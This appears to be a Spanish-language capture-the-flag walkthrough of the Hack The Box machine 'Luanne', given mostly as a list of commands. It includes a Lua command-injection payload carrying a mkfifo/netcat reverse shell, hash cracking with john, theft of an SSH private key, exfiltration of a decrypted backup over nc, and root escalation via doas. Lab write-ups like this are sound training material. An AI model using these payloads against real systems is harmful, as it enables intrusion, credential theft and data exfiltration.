Luanne
HTB Linux
nmap -A -p- -oA output 10.129.151.88 —min-rate=10000 —script=vuln —script-imeout=15 -v
nmap -sC -sV -O -p- -oA luanne 10.129.151.88
nmap -sU -O -p- -oA luanne-udp 10.129.151.88
nikto -h 10.129.151.88 :80
whatweb http://10.129.151.88
http://10.129.151.88/robots.txt
wfuzz -c —hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.151.88/weather/FUZZ
http://10.129.151.88/weather/forecast
curl -s -X GET “http://10.129.151.88/weather/forecast?city=London” | jq
Abrimos burpsuite y interceptamos
GET /weather/forecast?city=list
GET /weather/forecast?city=list’]%3b+os.execute[‘id’]—+-’
nc -lvnp 443
GET /weather/forecast?city=list’]%3b+os.execute[‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f’]—+-’
Le hacemos Ctrl +U para ulrencode
cat .htpasswd
guardamos el webapi_user y su contrasena en un archivo llamado hash
john —wordlist=/usr/share/wordlists/rockyou..txt hash
Credenciales-> webapi_user:iamthebest
ps -auwx
curl -s -X GET http://127.0.0.1:3001
curl -s -X GET http://127.0.0.1:3001/~r.michaels/id_rsa -u ‘webapi_user:iamthebest’; echo
Creamos un id_rsa
chmod 600 id_rsa
ssh -i id_rsa r.michaels@10.129.151.88
cd backups
cat devel_backup-2020-09-16.tar.gz.enc
netpgp —decrypt devel_backup-2020-09-16.tar.gz.enc —output /tmp/backup.tar.gz
nc 10.10.14.21 < backup.tar.gz
nc -lvnp 443 > backup.tar.gz
cat .htpasswd
vim hash2
john —worldlist=/usr/share/worldlists/rockyou.txt hash2
Credenciales->root:littlebear
doas su root
